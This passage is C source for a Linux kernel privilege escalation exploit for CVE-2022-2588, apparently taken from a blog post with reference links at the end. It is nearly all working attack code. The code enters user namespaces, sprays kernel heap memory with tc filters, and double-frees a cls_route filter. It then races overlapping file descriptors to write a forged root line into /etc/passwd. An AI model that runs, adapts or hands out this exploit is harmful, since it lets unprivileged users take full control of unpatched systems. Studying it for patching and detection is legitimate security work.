/* Fallback: fewer fds available, so spray proportionally less. */
rlim.rlim_cur = rlim.rlim_max = 4096;
spray_num_1 = 1200;
spray_num_2 = 2800;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0)
{
perror("setrlimit");
err(1, "setrlimit");
}
}
}

/*
 * Enter fresh user + network namespaces and map the real uid/gid to root
 * inside the user namespace.  This grants CAP_NET_ADMIN over the new
 * netns, which is what lets an unprivileged user reach the tc/rtnetlink
 * code paths.  Exits on any failure.
 */
void setup_namespace()
{
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0)
    {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0)
    {
        /* original mislabelled this as CLONE_NEWUSER */
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    /* Writing "deny" to setgroups is required before gid_map can be
     * written by an unprivileged process. */
    if (!write_file("/proc/self/setgroups", "deny"))
    {
        perror("[-] write_file(/proc/self/setgroups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid))
    {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid))
    {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}

#define NLMSG_TAIL(nmsg) \
((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))

/*
 * Write a single rtattr (type + payload) at the raw cursor `attr`.
 * Returns RTA_LENGTH(len) so callers can advance their write position.
 */
int addattr(char *attr, int type, void *data, int len)
{
    struct rtattr *rta = (struct rtattr *)attr;

    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);

    if (len != 0)
        memcpy(RTA_DATA(attr), data, len);

    return RTA_LENGTH(len);
}

/*
 * Append an rtattr to the end of netlink message `n`, growing nlmsg_len.
 * Returns 0 on success, -1 if the attribute would exceed `maxlen`.
 */
int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
int alen)
{
    int len = RTA_LENGTH(alen);

    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen)
    {
        fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen);
        return -1;
    }

    struct rtattr *rta = NLMSG_TAIL(n);
    rta->rta_type = type;
    rta->rta_len = len;
    if (alen != 0)
        memcpy(RTA_DATA(rta), data, alen);

    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
    return 0;
}

/*
 * Open a nested attribute: emit a zero-length rtattr of `type` and return
 * a pointer to it so addattr_nest_end() can patch in the real length.
 */
struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
{
    struct rtattr *start = NLMSG_TAIL(n);

    addattr_l(n, maxlen, type, NULL, 0);
    return start;
}

/*
 * Close a nested attribute opened by addattr_nest(): fix up its rta_len
 * to span everything appended since, and return the new message length.
 */
int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
{
    nest->rta_len = (char *)NLMSG_TAIL(n) - (char *)nest;
    return n->nlmsg_len;
}

/*
 * Install an "sfq" root qdisc on ifindex 1 (loopback of the new netns)
 * via RTM_NEWQDISC, so that route/basic filters can be attached later.
 * Returns the sendmsg() result, or -1 on allocation failure.
 */
int add_qdisc(int fd)
{
    char *start = malloc(0x1000);
    if (!start)
        return -1;
    memset(start, 0, 0x1000);
    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    // new qdisc
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));
    // set local
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = TC_H_ROOT;
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4);

// packing
#ifdef DEBUG
    DumpHex(msg, msg->nlmsg_len);
#endif

    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    int ret = sendmsg(fd, &msgh, 0);
    free(start); /* was leaked in the original */
    return ret;
}

/*
 * Create a cls_route filter (RTM_NEWTFILTER) with the given FROM/TO route
 * ids and tcm_handle.  Calling this with handle == 0 reaches the
 * CVE-2022-2588 path: route4_change() frees the old handle-0 filter
 * without removing it from the hash table, setting up the double free.
 * Always returns 1; sendmsg errors are intentionally ignored.
 */
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle,
u_int16_t flags)
{
    char *start = malloc(0x2000);
    memset(start, 0, 0x2000);
    struct nlmsghdr *msg = (struct nlmsghdr *)start;
    /* (dropped the original's `msg = msg + msg->nlmsg_len;` — nlmsg_len is
     * 0 after memset, so the scaled pointer advance was a no-op) */

    // new filter
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4);
    addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(fd, &msgh, 0);

    free(start);
    return 1;
}

/* Convenience wrapper: FROM = 0, TO = handle, kernel handle = (h<<8)+h. */
void add_tc(int sockfd, uint32_t handle, uint16_t flag)
{
    uint32_t full_handle = (handle << 8) + handle;

    add_tc_(sockfd, 0, handle, full_handle, flag);
}

/*
 * Mirror of the kernel's route4 handle layout: TO lives in bits 0-7 and
 * FROM in bits 16-23.  Returns the packed handle, or 0 when the
 * combination encodes an invalid handle (zero, or bit 15 set, or stray
 * bucket bits).  Both inputs must fit in a byte.
 */
uint32_t calc_handle(uint32_t from, uint32_t to)
{
    assert(from <= 0xff && to <= 0xff);

    uint32_t handle = (from << 16) | to;

    bool bucket_ok = ((handle & 0x7f00) | handle) == handle;
    if (!bucket_ok || handle == 0 || (handle & 0x8000))
        return 0;

    return handle;
}

/*
 * Delete the cls_route filter with the given kernel handle
 * (RTM_DELTFILTER, NLM_F_ECHO) and read back the kernel's echo reply.
 * Returns the malloc'd 0x4000-byte reply buffer; ownership passes to the
 * caller, who should free it.
 */
void *delete_tc_(int sockfd, u_int32_t handle)
{
    char *start = malloc(0x4000);
    memset(start, 0, 0x4000);
    struct nlmsghdr *msg = (struct nlmsghdr *)start;
    /* (dropped the original's no-op `msg = msg + msg->nlmsg_len;`) */

    // delete filter
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
    msg->nlmsg_type = RTM_DELTFILTER;
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(sockfd, &msgh, 0);

    /* Reuse the request buffer to receive the echoed reply. */
    memset(start, 0, 0x4000);
    iov.iov_len = 0x4000;
    iov.iov_base = start;
    recvmsg(sockfd, &msgh, 0);

    if (msgh.msg_namelen != sizeof(nladdr))
    {
        printf("size of sender address is wrong\n");
    }
    return start;
}

/*
 * Delete a route filter by its short handle ((h<<8)+h packing).
 * The echoed reply is not needed here, so free it immediately — the
 * original leaked the 0x4000-byte buffer on every call.
 */
void delete_tc(int sockfd, uint32_t handle)
{
    free(delete_tc_(sockfd, ((handle) << 8) + (handle)));
}

// basic for spray
/*
 * Heap-spray primitive: create a "basic" classifier whose ematch tree
 * carries spray_count/2 TCF_EM_META nodes.  Each meta lvalue/rvalue is a
 * kmalloc'd copy of spray_data (spray_len bytes), so one call plants many
 * controlled allocations in the target slab cache.  Always returns 1.
 */
int add_tc_basic(int fd, uint32_t handle, void *spray_data, size_t spray_len,
int spray_count)
{
assert(spray_len * spray_count < 0x3000);
char *start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr *msg = (struct nlmsghdr *)start;

// new filter
// NOTE(review): nlmsg_len is 0 after memset, so this advance is a no-op.
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; // | flags;
msg->nlmsg_type = RTM_NEWTFILTER;
struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
// t->tcm_parent = TC_H_ROOT;

addattr_l(msg, 0x4000, TCA_KIND, "basic", 6);
struct rtattr *tail = addattr_nest(msg, 0x4000, TCA_OPTIONS);
struct rtattr *ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES);
struct tcf_ematch_tree_hdr tree_hdr = {.nmatches = spray_count / 2,
.progid = 0};

addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr));
struct rtattr *rt_match_tail =
addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);

char *data = malloc(0x3000);
// Build one TCF_EM_META ematch per iteration, each carrying two copies
// of spray_data (left and right operands).
for (int i = 0; i < tree_hdr.nmatches; i++)
{
char *current;
memset(data, 0, 0x3000);
struct tcf_ematch_hdr *hdr = (struct tcf_ematch_hdr *)data;
hdr->kind = TCF_EM_META;
hdr->flags = TCF_EM_REL_AND;

current = data + sizeof(*hdr);

struct tcf_meta_hdr meta_hdr = {
.left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
.right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
};

// NOTE(review): `sizeof(hdr)` is the size of a pointer, not of meta_hdr;
// on 64-bit both happen to be 8 bytes, so this works by coincidence.
current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(hdr));
current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len);
current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);

addattr_l(msg, 0x4000, i + 1, data, current - data);
}

addattr_nest_end(msg, rt_match_tail);
addattr_nest_end(msg, ema_tail);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
sendmsg(fd, &msgh, 0);
free(data);
free(start);
return 1;
}

/*
 * Delete a "basic" classifier by handle (RTM_DELTFILTER, NLM_F_ECHO),
 * freeing the sprayed ematch allocations it held, and read back the echo
 * reply.  Returns the malloc'd 0x4000-byte reply buffer (caller frees).
 */
void *delete_tc_basic(int sockfd, u_int32_t handle)
{
char *start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr *msg = (struct nlmsghdr *)start;

// new filter
// NOTE(review): nlmsg_len is 0 after memset, so this advance is a no-op.
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
msg->nlmsg_type = RTM_DELTFILTER;
struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
// t->tcm_parent = TC_H_ROOT;

addattr_l(msg, 0x1000, TCA_KIND, "basic", 6);
struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};

sendmsg(sockfd, &msgh, 0);
// Reuse the request buffer to receive the echoed reply.
memset(start, 0, 0x4000);
iov.iov_len = 0x4000;
iov.iov_base = start;
recvmsg(sockfd, &msgh, 0);

if (msgh.msg_namelen != sizeof(nladdr))
{
printf("size of sender address is wrong\n");
}

return start;
}

/*
 * pthread entry: start a deliberately slow writev() on the UAF file.
 * Maps ~100 MiB of anonymous memory and submits it through 20 iovecs so
 * the kernel-side write stays in flight for a long time, holding the
 * struct file open while write_cmd() races it.  Always returns NULL.
 */
void *slow_write()
{
    printf("start slow write\n");
    clock_t start, end;
    int fd = open("./uaf", 1);

    if (fd < 0)
    {
        perror("error open uaf file");
        exit(-1);
    }

    unsigned long int addr = 0x30000000;
    int offset;
    for (offset = 0; offset < 0x80000 / 20; offset++)
    {
        void *r = mmap((void *)(addr + offset * 0x1000), 0x1000,
                       PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
        /* BUG FIX: mmap signals failure with MAP_FAILED, not a negative
         * pointer — the original `r < 0` test could never fire. */
        if (r == MAP_FAILED)
        {
            printf("allocate failed at 0x%x\n", offset);
        }
    }

    assert(offset > 0);

    void *mem = (void *)(addr);
    memcpy(mem, "hhhhh", 5);

    struct iovec iov[20];
    for (int i = 0; i < 20; i++)
    {
        iov[i].iov_base = mem;
        iov[i].iov_len = offset * 0x1000;
    }

    /* Tell write_cmd() the slow write is about to enter the kernel. */
    run_write = 1;
    start = clock();
    // 2GB max
    if (writev(fd, iov, 20) < 0)
    {
        perror("slow write");
    }
    end = clock();
    double spent = (double)(end - start) / CLOCKS_PER_SEC;
    printf("write done, spent %f s\n", spent);
    run_write = 0;
    return NULL; /* was missing in the original (value-returning function) */
}

/*
 * pthread entry: once slow_write() signals that its writev() is in
 * flight (run_write set), push the forged passwd `content` through the
 * overlapping descriptor.  Always returns NULL.
 */
void *write_cmd()
{
    /* (removed the original's unused local `data[]` copy of the forged
     * passwd line — `content` is what actually gets written) */
    struct iovec iov = {.iov_base = content, .iov_len = strlen(content)};

    /* Busy-wait until the slow write has started. */
    while (!run_write)
    {
    }
    run_spray = 1;
    if (writev(overlap_a, &iov, 1) < 0)
    {
        printf("failed to write\n");
    }
    printf("should be after the slow write\n");
    return NULL; /* was missing in the original (value-returning function) */
}

/*
 * One-time setup before exploit(), in dependency order: raise fd limits,
 * create/enter the scratch directory, then enter user+net namespaces.
 */
void pre_exploit()
{
adjust_rlimit();
use_temporary_dir();
setup_namespace();
}

/*
 * Main exploit sequence (runs in its own forked process, synchronized
 * with the spray process via pipe_parent/pipe_child):
 *  1. create the handle-0 route4 filter (the vulnerable object),
 *  2. trigger CVE-2022-2588 twice: the first replacement frees the filter
 *     (cross-cache frees its slab page), the second frees it again after
 *     the page has been reclaimed by sprayed struct files → a file is
 *     double-freed,
 *  3. spray open() fds and use kcmp() to find two fds sharing one struct
 *     file, then race slow_write/write_cmd to write the forged line into
 *     the read-only target (/etc/passwd),
 *  4. report success/failure to main() through pipe_main.
 */
void exploit()
{
char buf[2 * PAGE_SIZE] = {};
char msg[0x10] = {};
char *spray;
int cc;
struct rlimit old_lim, lim, new_lim;

// Get old limits
if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
printf("Old limits -> soft limit= %ld \t"
" hard limit= %ld \n",
old_lim.rlim_cur, old_lim.rlim_max);
pin_on_cpu(0);
printf("starting exploit, num of cores: %d\n", cpu_cores);

sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sockfd != -1);
add_qdisc(sockfd);

// wait for parent
if (read(pipe_child[0], msg, 2) != 2)
{
err(1, "read from parent");
}
// allocate the vulnerable object
// handle 0 + NLM_F_EXCL|NLM_F_CREATE: this is the filter that will be
// freed but left in the hash table.
add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE);

// ask parent to keep spraying
if (write(pipe_parent[1], "OK", 2) != 2)
{
err(1, "write to child");
}
if (read(pipe_child[0], msg, 2) != 2)
{
err(1, "read from parent");
}

// free the object, to free the slab
// Replacing the handle-0 filter frees it (first free) without unhashing.
add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE);

// wait for the vulnerable object being freed
// RCU grace period must elapse before the memory is really returned.
usleep(500 * 1000);
printf("freed the filter object\n");
// sync
if (write(pipe_parent[1], "OK", 2) != 2)
{
err(1, "write to child");
}
if (read(pipe_child[0], msg, 2) != 2)
{
err(1, "read from parent");
}

usleep(1000 * 1000);

// Reclaim the freed slab page with struct files (cross-cache spray).
for (int i = 0; i < spray_num_1; i++)
{
pin_on_cpu(i % cpu_cores);
fds[i] = open("./data2", 1);
assert(fds[i] > 0);
}

// double free route4, which will free the file
// Second replacement frees the stale hash-table entry → frees a file.
add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE);
usleep(1000 * 100);

// should not sleep too long, otherwise file might be claimed by others
printf("double free done\n");
printf("spraying files\n");

// the following is to figure out which file is freed
for (int i = 0; i < spray_num_2; i++)
{
pin_on_cpu(i % cpu_cores);
fd_2[i] = open("./uaf", 1);
assert(fd_2[i] > 0);
for (int j = 0; j < spray_num_1; j++)
{
// kcmp returns 0 when both fds reference the same struct file —
// that identifies the doubly-allocated file object.
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) ==
0)
{
printf("found overlap, id : %d, %d\n", i, j);
overlap_a = fds[j];
overlap_b = fd_2[i];

// Race: slow_write holds the file busy while write_cmd writes.
pthread_t pid, pid2;
pthread_create(&pid, NULL, slow_write, NULL);
pthread_create(&pid2, NULL, write_cmd, NULL);

while (!run_spray)
{
}

// Closing both fds frees the struct file again, while the slow
// write is still using it.
close(overlap_a);
close(overlap_b);
printf("closed overlap\n");

usleep(1000 * 100);

// Ask the helper process to respray the target file so the
// in-flight write lands on /etc/passwd's struct file.
int spray_num = 4096;
write(pipe_file_spray[0][1], &spray_num, sizeof(int));
if (read(pipe_file_spray[1][0], &msg, 2) != 2)
{
err(1, "read from file spray");
}
overlapped = true;
}
}
if (overlapped)
break;
}

sleep(3);
while (run_write)
{
sleep(1);
}

if (!overlapped)
{
printf("no overlap found :(...\n");
write(pipe_main[1], "\xff", 1);
}
else
{
int xx = open(target, 0);
char buf[0x100] = {};
// check if user in the passwd
read(xx, buf, 0x30);
if (!strncmp(buf, "user", 4))
{
write(pipe_main[1], "\x00", 1);
}
else
{
printf("not successful : %s\n", buf);
write(pipe_main[1], "\xff", 1);
}
}
while (1)
{
sleep(1000);
}
}

/* Placeholder for post-exploitation cleanup; intentionally empty. */
void post_exploit() {}

// this poc assume we have a heap address leaked
int run_exp()
{
if (pipe(pipe_parent) == -1)
{
err(1, "fail to create pipes\n");
}

if (pipe(pipe_child) == -1)
{
err(1, "fail to create pipes\n");
}

if (pipe(pipe_defrag) == -1)
{
err(1, "fail to create pipes\n");
}

if (pipe(pipe_file_spray[0]) == -1)
{
err(1, "fail to create pipes\n");
}

if (pipe(pipe_file_spray[1]) == -1)
{
err(1, "fail to create pipes\n");
}

cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);

if (fork() == 0)
{
// thread for spraying file we want to overwrite
adjust_rlimit();
int spray_num = 0;
if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int))
{
err(1, "read file spray");
}

printf("got cmd, start spraying %s\n", target);
spray_num = 4096;
if (fork() == 0)
{
for (int i = 0; i < spray_num; i++)
{
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
while (1)
{
sleep(10000);
}
}

for (int i = 0; i < spray_num; i++)
{
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
printf("spray done\n");
write(pipe_file_spray[1][1], "OK", 2);
while (1)
{
sleep(10000);
}
exit(0);
}

if (fork() == 0)
{
pin_on_cpu(0);
pre_exploit();
exploit();
post_exploit();
}
else
{
sleep(2);
if (fork() == 0)
{
// do the defragmentation to exhaust all file slabs
// for cross cache
adjust_rlimit();
for (int i = 0; i < 10000; i++)
{
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
printf("defrag done\n");
if (write(pipe_defrag[1], "OK", 2) != 2)
{
err(1, "failed write defrag");
}
while (1)
{
sleep(1000);
}
}
else
{
// memory spray thread
setup_namespace();
pin_on_cpu(0);
int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sprayfd != -1);
add_qdisc(sprayfd);

char msg[0x10] = {};
char payload[256] = {};
memset(payload + 0x10, 'A', 256 - 0x10);

if (read(pipe_defrag[0], msg, 2) != 2)
{
err(1, "failed read defrag");
}

// if the exploit keeps failing, please tune the middle and end
int middle = 38;
int end = middle + 40;

// preparing for cross cache
for (int i = 0; i < middle; i++)
{
add_tc_basic(sprayfd, i + 1, payload, 193, 32);
}

add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
if (write(pipe_child[1], "OK", 2) != 2)
{
err(1, "write to parent\n");
}
// allocate route4
if (read(pipe_parent[0], msg, 2) != 2)
{
err(1, "read from parent");
}
// add_tc_basic(sprayfd, middle+2, payload, 129, 32);

// prepare another part for cross cache
for (int i = middle + 2; i < end; i++)
{
add_tc_basic(sprayfd, i + 1, payload, 193, 32);
}
printf("spray 256 done\n");

for (int i = 1; i < end - 24; i++)
{
// prevent double free of 192
// and being reclaimed by others
if (i == middle || i == middle + 1)
continue;
delete_tc_basic(sprayfd, i + 1);
}
if (write(pipe_child[1], "OK", 2) != 2)
{
err(1, "write to parent\n");
}
// free route4 here
if (read(pipe_parent[0], msg, 2) != 2)
{
err(1, "read from parent");
}
// if (cpu_cores == 1) sleep(1);
delete_tc_basic(sprayfd, middle + 2);
delete_tc_basic(sprayfd, middle + 3);
delete_tc_basic(sprayfd, 1);
for (int i = middle + 2; i < end; i++)
{
delete_tc_basic(sprayfd, i + 1);
}

printf("256 freed done\n");

if (write(pipe_child[1], "OK", 2) != 2)
{
err(1, "write to parent\n");
}
while (1)
{
sleep(1000);
}
}
}
}

/*
 * Entry point: build the forged passwd content in a MAP_SHARED page
 * (visible to all forked children), fork the exploit orchestrator, then
 * block on pipe_main for the one-byte success (0) / failure (0xff) code.
 */
int main(int argc, char **argv)
{
    global = (char *)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_SHARED | MAP_ANON, -1, 0);
    if (global == MAP_FAILED) /* was unchecked in the original */
    {
        perror("mmap");
        return 1;
    }
    memset(global, 0, 0x2000);

    self_path = global;
    snprintf(self_path, 0x100, "%s/%s", get_current_dir_name(), argv[0]);
    printf("self path %s\n", self_path);

    /* New content = forged root line + current file head, so existing
     * accounts keep working after the overwrite. */
    int fd = open(target, 0);
    if (fd < 0) /* was unchecked: read(-1, ...) silently failed */
    {
        perror("open target");
        return 1;
    }
    content = (char *)(global + 0x100);
    strcpy(content, overwrite);
    if (read(fd, content + strlen(overwrite), 0x1000) < 0)
    {
        perror("read target");
    }
    close(fd);

    assert(pipe(pipe_main) == 0);

    printf("prepare done\n");

    if (fork() == 0)
    {
        run_exp();
        while (1)
        {
            sleep(10000);
        }
    }

    /* Block until the exploit child reports its result. */
    char data = -1; /* initialized: original read `data` uninitialized if
                     * the pipe read failed */
    if (read(pipe_main[0], &data, 1) == 1 && data == 0)
    {
        printf("succeed\n");
    }
    else
    {
        printf("failed\n");
    }
    return 0;
}

参考链接:

https://github.com/Markakd/CVE-2022-2588

https://paper.seebug.org/2019/

https://elixir.bootlin.com/linux/v5.14/source

 评论
评论插件加载失败
正在加载评论插件
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 335.6k 访客数 访问量